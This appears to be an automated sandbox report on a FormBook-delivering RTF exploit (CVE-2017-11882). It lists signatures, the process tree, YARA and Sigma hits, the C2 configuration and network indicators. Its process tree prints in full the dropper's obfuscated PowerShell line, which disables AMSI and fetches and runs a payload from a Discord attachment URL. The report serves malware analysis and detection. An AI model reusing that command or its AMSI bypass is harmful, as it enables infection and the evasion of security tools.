Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.15350.12171

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.15350.12171 (renamed file extension from 12171 to rtf)
Analysis ID:532961
MD5:bdacb3b17f31a06a8cfbedba2342bdf5
SHA1:9f6930782942ec4bedc162be334b97f861d24f75
SHA256:16fc1ecc295f8d7dba6647b9aeb8d538932910b24f3affe1853a82ab2c9d944a
Tags:rtf
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document contains OLE streams which likely are hidden ActiveX objects
Sigma detected: Office product drops script at suspicious location
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Suspicious Script Execution From Temp Folder
Document contains OLE streams with names of living off the land binaries
Creates processes via WMI
Performs DNS queries to domains with low reputation
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Tries to detect virtualization through RDTSC time measurements
Sigma detected: WScript or CScript Dropper
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Sample uses process hollowing technique
Writes to foreign memory regions
Sigma detected: Microsoft Office Product Spawning Windows Shell
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Very long command line found
Microsoft Office drops suspicious files
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Found suspicious RTF objects
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Office Equation Editor has been started
Creates a window with clipboard capturing capabilities
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 672 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1232 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 1812 cmdline: CmD.exe /C cscript %tmp%\Client.vbs A C MD5: AD7B9C14083B52BC532FBA5948342B98)
      • cscript.exe (PID: 2700 cmdline: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C MD5: A3A35EE79C64A640152B3113E6E254E2)
  • powershell.exe (PID: 2652 cmdline: Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$0462662046266204626620462662046266204626620462662=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,57,49,53,51,52,55,56,52,53,55,53,50,55,48,53,49,48,57,47,57,49,53,55,57,57,56,48,48,55,52,48,52,54,50,54,54,50,47,109,111,110,111,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($0462662046266204626620462662046266204626620462662)|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • calc.exe (PID: 3060 cmdline: {path} MD5: 60B7C0FEAD45F2066E5B805A91F4F0FC)
      • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • rundll32.exe (PID: 236 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • cmd.exe (PID: 2176 cmdline: /c del "C:\WINDOWS\syswow64\calc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.getyourshoponline.com/t3t2/"], "decoy": ["professorphilipkaloki.com", "restorationlifeplus.com", "worldfreegamez.com", "paulasnaturalelements.com", "vecydoy.xyz", "certifiedhalina.com", "roundrockmail.com", "dyort.com", "ge3f.xyz", "skafina.store", "centsablefinancialplanning.com", "avatarig.com", "meta-x.store", "metataxbit.com", "contact-ebf.com", "soungy.com", "theoptiontwo.com", "pangeadba.com", "imovelemoradia.com", "almisanbs.net", "tracarau.info", "waterfallswisconsinplus.xyz", "d6f0tmpjmk9eutnnvfk4716.com", "kafani.xyz", "myponzu.com", "indigovideography.com", "poolcomplaints.com", "metaboxgame.xyz", "dtbd.net", "nocallwaiting.com", "imim-token.com", "annaitherasa.com", "caratnaked.com", "nnhu.space", "ballufa.bet", "theoudhy.com", "theroadbrand.store", "voguishshop.com", "wintangible.com", "cornheaderparts.com", "pulpbranding.com", "ambulante-reha-muenchen.com", "xd7bh22mc04.xyz", "keldefi.com", "maman-travail.com", "socialbizz.xyz", "shopauthentictampabayrays.com", "camylo.online", "zhangchanghong.com", "tafelimited.com", "eminkoy.com", "towne-kitchen.com", "marcasemele.com", "203.life", "innerrackers.com", "fddf.xyz", "sweettreatworld.com", "freeze-the-fat-away.com", "lillianpsmith.com", "fabulouspatricia.com", "sling-city.com", "wavesmodel.com", "africanancesry.com", "os-meta.com"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmprtf_cve2017_11882_oleAttempts to identify the exploit CVE 2017 11882John Davison
  • 0x3000:$headers: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00 C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03 0A
  • 0x3021:$font: 0A 01 08 5A 5A
  • 0x3052:$winexec: 12 0C 43 00
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmpEXP_potential_CVE_2017_11882unknownReversingLabs
  • 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
  • 0x2f00:$equation1: Equation Native
  • 0x920:$equation2: Microsoft Equation 3.0
  • 0x3029:$exe: .exe
  • 0x3052:$address: 12 0C 43 00

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.568094233.0000000006339000.00000004.00000001.sdmprtf_cve2017_11882_oleAttempts to identify the exploit CVE 2017 11882John Davison
    • 0x4900:$headers: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00 E8 D8 33 06 00 00 00 00 00 00 00 00 03 01 01 03 0A
    • 0x4921:$font: 0A 01 08 5A 5A
    • 0x4952:$winexec: 12 0C 43 00
    0000000A.00000002.510729080.0000000000080000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 27 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.0.calc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        10.0.calc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        10.0.calc.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        10.0.calc.exe.400000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          10.0.calc.exe.400000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 14 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1232, ProcessCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ProcessId: 1812
          Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
          Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 236
          Sigma detected: Suspicious Script Execution From Temp FolderShow sources
          Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine|base64offset|contains: r+, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1812, ProcessCommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, ProcessId: 2700
          Sigma detected: WScript or CScript DropperShow sources
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine|base64offset|contains: r+, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1812, ProcessCommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, ProcessId: 2700
          Sigma detected: Suspicious Rundll32 Without Any CommandLine ParamsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 236
          Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1232, ProcessCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ProcessId: 1812

          Data Obfuscation:

          barindex
          Sigma detected: Office product drops script at suspicious locationShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 672, TargetFilename: C:\Users\user\AppData\Local\Temp\Client.vbs

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
          Found malware configurationShow sources
          Source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.getyourshoponline.com/t3t2/"], "decoy": ["professorphilipkaloki.com", "restorationlifeplus.com", "worldfreegamez.com", "paulasnaturalelements.com", "vecydoy.xyz", "certifiedhalina.com", "roundrockmail.com", "dyort.com", "ge3f.xyz", "skafina.store", "centsablefinancialplanning.com", "avatarig.com", "meta-x.store", "metataxbit.com", "contact-ebf.com", "soungy.com", "theoptiontwo.com", "pangeadba.com", "imovelemoradia.com", "almisanbs.net", "tracarau.info", "waterfallswisconsinplus.xyz", "d6f0tmpjmk9eutnnvfk4716.com", "kafani.xyz", "myponzu.com", "indigovideography.com", "poolcomplaints.com", "metaboxgame.xyz", "dtbd.net", "nocallwaiting.com", "imim-token.com", "annaitherasa.com", "caratnaked.com", "nnhu.space", "ballufa.bet", "theoudhy.com", "theroadbrand.store", "voguishshop.com", "wintangible.com", "cornheaderparts.com", "pulpbranding.com", "ambulante-reha-muenchen.com", "xd7bh22mc04.xyz", "keldefi.com", "maman-travail.com", "socialbizz.xyz", "shopauthentictampabayrays.com", "camylo.online", "zhangchanghong.com", "tafelimited.com", "eminkoy.com", "towne-kitchen.com", "marcasemele.com", "203.life", "innerrackers.com", "fddf.xyz", "sweettreatworld.com", "freeze-the-fat-away.com", "lillianpsmith.com", "fabulouspatricia.com", "sling-city.com", "wavesmodel.com", "africanancesry.com", "os-meta.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.0.calc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.510729080.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.492675256.000000000986B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.473605358.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.684930109.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.473336925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.684853632.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.502031840.000000000986B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.511533102.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.510812516.0000000000280000.00000040.00020000.sdmp, type: MEMORY
          Source: 10.0.calc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 10.2.calc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 10.0.calc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 10.2.calc.exe.30000.0.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 10.0.calc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 10.2.calc.exe.2f6578.1.unpackAvira: Label: TR/ATRAPS.Gen

          Exploits:

          barindex
          Found potential equation exploit (CVE-2017-11882)Show sources
          Source: Static RTF information: Object: 1 Offset: 0001CF23h
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
          Source: ~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp.0.drStream path '_1699986732/\x1CompObj' : ...........................F....Microsoft Equation
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49167 version: TLS 1.2
          Source: Binary string: wntdll.pdb source: calc.exe, calc.exe, 0000000A.00000003.476792049.0000000000590000.00000004.00000001.sdmp, calc.exe, 0000000A.00000003.473897930.0000000000430000.00000004.00000001.sdmp, calc.exe, 0000000A.00000002.513205717.0000000000B90000.00000040.00000001.sdmp, calc.exe, 0000000A.00000002.512398332.0000000000A10000.00000040.00000001.sdmp, rundll32.exe
          Source: Binary string: rundll32.pdb source: calc.exe, 0000000A.00000002.510696461.0000000000030000.00000040.00020000.sdmp, calc.exe, 0000000A.00000002.510980436.00000000002E4000.00000004.00000020.sdmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

          Software Vulnerabilities:

          barindex
          Document exploit detected (creates forbidden files)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.vbsJump to behavior
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 162.159.135.233:443
          Source: global trafficDNS query: name: google.com
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 162.159.135.233:443

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 185.230.63.177:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 185.230.63.177:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 185.230.63.177:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.marcasemele.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.230.63.177 80
          Source: C:\Windows\explorer.exeDomain query: www.lillianpsmith.com
          Source: C:\Windows\explorer.exeDomain query: www.vecydoy.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 50.62.137.48 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.39.13 80
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.vecydoy.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.getyourshoponline.com/t3t2/
